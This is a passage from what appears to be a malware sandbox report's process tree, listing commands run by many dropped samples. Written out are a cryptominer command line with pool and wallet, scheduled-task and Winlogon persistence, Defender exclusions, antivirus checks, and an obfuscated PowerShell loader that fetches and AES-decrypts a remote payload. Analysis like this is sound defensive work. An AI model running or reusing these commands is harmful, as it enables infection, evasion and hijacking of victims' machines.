  PID:2472
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp783C.tmp.bat""
    3⤵
    PID:1048
  - - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
      "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      4⤵
      PID:844
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        5⤵
        
        PID:564
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:452
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
        5⤵
        
        PID:1768
- C:\Users\Admin\AppData\Local\Temp\Files\Winlock.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Winlock.exe"
  2⤵
  PID:2872
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /V/K reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe, C:\Windows\system32\drivers\Bbm33bf3a3zbb3X3ububT3xbKb.exe" /f
    3⤵
    PID:2892
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe, C:\Windows\system32\drivers\Bbm33bf3a3zbb3X3ububT3xbKb.exe" /f
      4⤵
      PID:1572
  - - C:\Windows\system32\cmd.exe
      cmd.exe
      4⤵
      PID:888
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:1952
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:2292
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:1988
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:3032
- C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"
  2⤵
  PID:2036
- C:\Users\Admin\AppData\Local\Temp\Files\hv.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"
  2⤵
  PID:1168
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    3⤵
    PID:1500
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    3⤵
    PID:572
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 708
    3⤵
    - Program crash
    PID:880
- C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"
  2⤵
  PID:2980
- - C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"
    3⤵
    PID:1268
- C:\Users\Admin\AppData\Local\Temp\Files\Amdau.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Amdau.exe"
  2⤵
  PID:2624
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
    3⤵
    PID:2564
- C:\Users\Admin\AppData\Local\Temp\Files\net.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\net.exe"
  2⤵
  PID:1916
- C:\Users\Admin\AppData\Local\Temp\Files\dvchost.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\dvchost.exe"
  2⤵
  PID:2140
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
    3⤵
    PID:1880
  - - C:\Windows\system32\mode.com
      mode 65,10
      4⤵
      PID:1568
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e file.zip -p1979614625696244291525413362 -oextracted
      4⤵
      PID:2332
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_3.zip -oextracted
      4⤵
      PID:1672
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_1.zip -oextracted
      4⤵
      PID:1928
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_2.zip -oextracted
      4⤵
      PID:1060
  - - C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe
      "winhostDhcp.exe"
      4⤵
      PID:1048
  - - C:\Windows\system32\attrib.exe
      attrib +H "winhostDhcp.exe"
      4⤵
      Views/modifies file attributes
      PID:2792
- C:\Users\Admin\AppData\Local\Temp\Files\Update.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Update.exe"
  2⤵
  PID:2952
- C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe"
  2⤵
  PID:2720
- - C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe"
    3⤵
    PID:2040
- C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe"
  2⤵
  PID:1752
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 800
    3⤵
    - Program crash
    PID:2584
- C:\Users\Admin\AppData\Local\Temp\Files\rty45.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\rty45.exe"
  2⤵
  PID:1968
- C:\Users\Admin\AppData\Local\Temp\Files\zxcvb.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\zxcvb.exe"
  2⤵
  PID:1660
- C:\Users\Admin\AppData\Local\Temp\Files\v4install.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\v4install.exe"
  2⤵
  PID:1608
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\BridgeportWebDllNet\cMC3vG7uf0oG.vbe"
    3⤵
    PID:1676
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Roaming\BridgeportWebDllNet\b7te9U2.bat" "
      4⤵
      PID:1728
    - - C:\Users\Admin\AppData\Roaming\BridgeportWebDllNet\agentServerComponent.exe
        
        "C:\Users\Admin\AppData\Roaming\BridgeportWebDllNet/agentServerComponent.exe"
        5⤵
        
        PID:2328
- C:\Users\Admin\AppData\Local\Temp\Files\%E9%A3%9E%E8%9B%BE%E5%B7%A5%E5%85%B7%E7%AE%B1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\%E9%A3%9E%E8%9B%BE%E5%B7%A5%E5%85%B7%E7%AE%B1.exe"
  2⤵
  PID:2636
- C:\Users\Admin\AppData\Local\Temp\Files\59162d6533d5d56ceedd3f8a24e85e75cd198c72db5719188a4a582752d7fbe4.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\59162d6533d5d56ceedd3f8a24e85e75cd198c72db5719188a4a582752d7fbe4.exe"
  2⤵
  PID:396
- C:\Users\Admin\AppData\Local\Temp\Files\901d3bacbe82db5382c4f653efb11d4784254b3ad727530c73ae327b734c1a4b.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\901d3bacbe82db5382c4f653efb11d4784254b3ad727530c73ae327b734c1a4b.exe"
  2⤵
  PID:2380
- C:\Users\Admin\AppData\Local\Temp\Files\rwtweewge.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\rwtweewge.exe"
  2⤵
  PID:2784
- C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"
  2⤵
  PID:964
- C:\Users\Admin\AppData\Local\Temp\Files\SystemUpdate.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\SystemUpdate.exe"
  2⤵
  PID:2332
- C:\Users\Admin\AppData\Local\Temp\Files\$77_loader.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\$77_loader.exe"
  2⤵
  PID:2308
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l0dehxuq.cmdline"
    3⤵
    PID:2876
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2F4C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2E03.tmp"
      4⤵
      PID:2724
- - C:\Windows\system32\chcp.com
    "C:\Windows\system32\chcp.com" 437
    3⤵
    PID:3012
- C:\Users\Admin\AppData\Local\Temp\Files\a0538252234edd82661f55fea05df541c095a9f74368d8dca1582d797a1d084a.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\a0538252234edd82661f55fea05df541c095a9f74368d8dca1582d797a1d084a.exe"
  2⤵
  PID:2856
- - C:\Users\Admin\AppData\Local\Temp\Files\a0538252234edd82661f55fea05df541c095a9f74368d8dca1582d797a1d084a.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\a0538252234edd82661f55fea05df541c095a9f74368d8dca1582d797a1d084a.exe"
    3⤵
    PID:2916
- C:\Users\Admin\AppData\Local\Temp\Files\setup_wm.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\setup_wm.exe"
  2⤵
  PID:2136
- C:\Users\Admin\AppData\Local\Temp\Files\6.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\6.exe"
  2⤵
  PID:1936
- C:\Users\Admin\AppData\Local\Temp\Files\v2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\v2.exe"
  2⤵
  PID:1740
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    3⤵
    PID:1392
- C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe"
  2⤵
  PID:2820
- C:\Users\Admin\AppData\Local\Temp\Files\NINJA.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\NINJA.exe"
  2⤵
  PID:2876
- - C:\Windows\SysWOW64\WSCript.exe
    WSCript C:\Users\Admin\AppData\Local\Temp\SBADLH.vbs
    3⤵
    PID:1124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c schtasks /create /tn SBADLH.exe /tr C:\Users\Admin\AppData\Roaming\Windata\system.exe /sc minute /mo 1
    3⤵
    PID:1504
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn SBADLH.exe /tr C:\Users\Admin\AppData\Roaming\Windata\system.exe /sc minute /mo 1
      4⤵
      Creates scheduled task(s)
      PID:2672
- C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"
  2⤵
  PID:1156
- C:\Users\Admin\AppData\Local\Temp\Files\LM.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\LM.exe"
  2⤵
  PID:2340
- C:\Users\Admin\AppData\Local\Temp\Files\Helper.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Helper.exe"
  2⤵
  PID:1504
- - C:\Windows\SysWOW64\msiexec.exe
    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\Files\Helper.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\Files\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1707316134 "
    3⤵
    PID:780
- C:\Users\Admin\AppData\Local\Temp\Files\kehu.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\kehu.exe"
  2⤵
  PID:788
- C:\Users\Admin\AppData\Local\Temp\Files\Doublepulsar-1.3.1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Doublepulsar-1.3.1.exe"
  2⤵
  PID:2392
- C:\Users\Admin\AppData\Local\Temp\Files\c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe"
  2⤵
  PID:1492
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:3116
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 48
    3⤵
    - Program crash
    PID:3160
- C:\Users\Admin\AppData\Local\Temp\Files\pinguin.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\pinguin.exe"
  2⤵
  PID:3380
- C:\Users\Admin\AppData\Local\Temp\Files\more.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\more.exe"
  2⤵
  PID:3420
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UiKVWpFsayx" /XML "C:\Users\Admin\AppData\Local\Temp\tmp585D.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:3156
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\UiKVWpFsayx.exe"
    3⤵
    PID:3144
- - C:\Users\Admin\AppData\Local\Temp\Files\more.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\more.exe"
    3⤵
    PID:3296
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "images" /tr '"C:\Users\Admin\AppData\Roaming\images.exe"' & exit
      4⤵
      PID:3136
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "images" /tr '"C:\Users\Admin\AppData\Roaming\images.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:3428
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpD894.tmp.bat""
      4⤵
      PID:4068
    - - C:\Users\Admin\AppData\Roaming\images.exe
        
        "C:\Users\Admin\AppData\Roaming\images.exe"
        5⤵
        
        PID:3224
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:3276
- C:\Users\Admin\AppData\Local\Temp\Files\NeonRank.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\NeonRank.exe"
  2⤵
  PID:3548
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k move Bathrooms Bathrooms.bat & Bathrooms.bat & exit
    3⤵
    PID:3760
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
      4⤵
      PID:3812
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:3804
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa.exe opssvc.exe"
      4⤵
      PID:3096
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:2808
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b Compound + Injection + Emotions + Worm + Participants + Richmond 29418\Taxes.pif
      4⤵
      PID:3384
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b Declare + Assured + Trap 29418\Q
      4⤵
      PID:2692
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c mkdir 29418
      4⤵
      PID:3724
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 5 localhost
      4⤵
      Runs ping.exe
      PID:3744
  - - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\29418\Taxes.pif
      29418\Taxes.pif 29418\Q
      4⤵
      PID:3468
- C:\Users\Admin\AppData\Local\Temp\Files\5fe74ecfd6a9eeef45bed3760e4511c300dc843d17120361e5abd021cc107567.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\5fe74ecfd6a9eeef45bed3760e4511c300dc843d17120361e5abd021cc107567.exe"
  2⤵
  PID:3672
- - C:\Users\Admin\AppData\Local\Temp\ghoul.exe
    "C:\Users\Admin\AppData\Local\Temp\ghoul.exe"
    3⤵
    PID:3964
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      4⤵
      PID:3300
- C:\Users\Admin\AppData\Local\Temp\Files\659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe"
  2⤵
  PID:3828
- C:\Users\Admin\AppData\Local\Temp\Files\Cheat.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Cheat.exe"
  2⤵
  PID:1872
- - C:\Users\Admin\AppData\Local\Temp\is-51L4I.tmp\Cheat.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-51L4I.tmp\Cheat.tmp" /SL5="$30320,30157316,832512,C:\Users\Admin\AppData\Local\Temp\Files\Cheat.exe"
    3⤵
    PID:3960
- C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
  C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
  2⤵
  PID:2880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\SysWOW64\cmd.exe
    3⤵
    PID:3888
  - - C:\Windows\System32\certutil.exe
      C:\Windows\System32\certutil.exe
      4⤵
      PID:2272
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3788
- C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"
  2⤵
  PID:3520
- - C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
    "C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe"
    3⤵
    PID:3616
- C:\Users\Admin\AppData\Local\Temp\Files\miner.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\miner.exe"
  2⤵
  PID:3904
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\miner.exe'; Add-MpPreference -ExclusionProcess 'miner'; Add-MpPreference -ExclusionPath 'C:\Users\Admin'"
    3⤵
    PID:3952
- - C:\Users\Admin\AppData\Local\Temp\3345e106-85d9-454f-8231-8822cd834a88.exe
    "C:\Users\Admin\AppData\Local\Temp\3345e106-85d9-454f-8231-8822cd834a88.exe"
    3⤵
    PID:4060
- C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup2.exe"
  2⤵
  PID:3412
- - C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
    C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
    3⤵
    PID:3868
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
      4⤵
      PID:1468
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:4048
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
        5⤵
        Creates scheduled task(s)
        
        PID:3488
- - C:\Users\Admin\AppData\Local\Temp\nsy8AD4.tmp
    C:\Users\Admin\AppData\Local\Temp\nsy8AD4.tmp
    3⤵
    PID:3140
- C:\Users\Admin\AppData\Local\Temp\Files\univ.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\univ.exe"
  2⤵
  PID:3636
- C:\Users\Admin\AppData\Local\Temp\Files\DefenderControl.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\DefenderControl.exe"
  2⤵
  PID:3840
- C:\Users\Admin\AppData\Local\Temp\Files\4c6358aa.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\4c6358aa.exe"
  2⤵
  PID:2296
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:3884
- C:\Users\Admin\AppData\Local\Temp\Files\native.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\native.exe"
  2⤵
  PID:3932
- C:\Users\Admin\AppData\Local\Temp\Files\crypted_d786fd3e.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\crypted_d786fd3e.exe"
  2⤵
  PID:3896
- C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe"
  2⤵
  PID:1816
- C:\Users\Admin\AppData\Local\Temp\Files\VLTKNhatRac.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\VLTKNhatRac.exe"
  2⤵
  PID:3612
- C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe"
  2⤵
  PID:3232
- C:\Users\Admin\AppData\Local\Temp\Files\flt_shovemydiscoupyourarse.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\flt_shovemydiscoupyourarse.exe"
  2⤵
  PID:3332
- C:\Users\Admin\AppData\Local\Temp\Files\setup294.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\setup294.exe"
  2⤵
  PID:3880
- - C:\Windows\SysWOW64\control.exe
    "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\g7CCGOwi.Cpl",
    3⤵
    PID:1640
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\g7CCGOwi.Cpl",
      4⤵
      PID:3476
- C:\Users\Admin\AppData\Local\Temp\Files\data64_6.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\data64_6.exe"
  2⤵
  PID:4016
- C:\Users\Admin\AppData\Local\Temp\Files\inte.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\inte.exe"
  2⤵
  PID:2808
- C:\Users\Admin\AppData\Local\Temp\Files\teamviewer.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\teamviewer.exe"
  2⤵
  PID:1556

C:\Windows\system32\cmd.exe
cmd.exe
1⤵
PID:888

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
1⤵
PID:1952

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
1⤵
PID:2292

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
1⤵
PID:1988

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
1⤵
PID:3032

C:\ProgramData\qrabctnrcogv\uyzpsnbeowaz.exe
C:\ProgramData\qrabctnrcogv\uyzpsnbeowaz.exe
1⤵
PID:2892

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:2292

C:\Windows\system32\timeout.exe
timeout 3
1⤵
- Delays execution with timeout.exe
PID:2440

C:\Windows\system32\taskeng.exe
taskeng.exe {BBD3BD41-3757-45AE-93CB-8A1D2B244836} S-1-5-21-3818056530-936619650-3554021955-1000:SFVRQGEO\Admin:Interactive:[1]
1⤵
PID:1756
- C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  2⤵
  PID:1584
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    PID:788
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      4⤵
      Creates scheduled task(s)
      PID:2792
- C:\Users\Admin\AppData\Roaming\Windata\system.exe
  C:\Users\Admin\AppData\Roaming\Windata\system.exe
  2⤵
  PID:1156

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:2984
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 9103C1C92917A727F41524A8DF71A11B C
  2⤵
  PID:1664

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1488

C:\Windows\SysWOW64\timeout.exe
timeout 3
1⤵
- Delays execution with timeout.exe
PID:3276

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x594
1⤵
PID:3744

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1448
- C:\Users\Admin\AppData\Local\Temp\Files\gookcom.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\gookcom.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3000
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $danaAlannah = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $aramisAlannah = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NDE2OTU=')); $sherpasReparel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTBhNjg=')); $oberonDana = new-object System.Net.Sockets.TcpClient; $oberonDana.Connect($danaAlannah, [int]$aramisAlannah); $alannahArain = $oberonDana.GetStream(); $oberonDana.SendTimeout = 300000; $oberonDana.ReceiveTimeout = 300000; $gliomaArain = [System.Text.StringBuilder]::new(); $gliomaArain.AppendLine('GET /' + $sherpasReparel); $gliomaArain.AppendLine('Host: ' + $danaAlannah); $gliomaArain.AppendLine(); $gliomaAramis = [System.Text.Encoding]::ASCII.GetBytes($gliomaArain.ToString()); $alannahArain.Write($gliomaAramis, 0, $gliomaAramis.Length); $onusArain = New-Object System.IO.MemoryStream; $alannahArain.CopyTo($onusArain); $alannahArain.Dispose(); $oberonDana.Dispose(); $onusArain.Position = 0; $gliomaSowback = $onusArain.ToArray(); $onusArain.Dispose(); $sowbackAlannah = [System.Text.Encoding]::ASCII.GetString($gliomaSowback).IndexOf('`r`n`r`n')+1; $gliomaAlannah = [System.Text.Encoding]::ASCII.GetString($gliomaSowback[$sowbackAlannah..($gliomaSowback.Length-1)]); $gliomaAlannah = [System.Convert]::FromBase64String($gliomaAlannah); $sherpasSowback = New-Object System.Security.Cryptography.AesManaged; $sherpasSowback.Mode = [System.Security.Cryptography.CipherMode]::CBC; $sherpasSowback.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $sherpasSowback.Key = [System.Convert]::FromBase64String('yhw+bQ6dDyupOV1xzuOhL65Top3x+yWenlXd6UEYqAM='); $sherpasSowback.IV = [System.Convert]::FromBase64String('pXmM/4stDHWwo+KOQjpI+A=='); $sherpasAramis = $sherpasSowback.CreateDecryptor(); $gliomaAlannah = $sherpasAramis.TransformFinalBlock($gliomaAlannah, 0, $gliomaAlannah.Length); $sherpasAramis.Dispose(); $sherpasSowback.Dispose(); $alannahSherpas = New-Object System.IO.MemoryStream(, $gliomaAlannah); $aramisSherpas = New-Object System.IO.MemoryStream; $oberonAramis = New-Object System.IO.Compression.GZipStream($alannahSherpas, [IO.Compression.CompressionMode]::Decompress); $oberonAramis.CopyTo($aramisSherpas); $gliomaAlannah = $aramisSherpas.ToArray(); $onusSherpas = 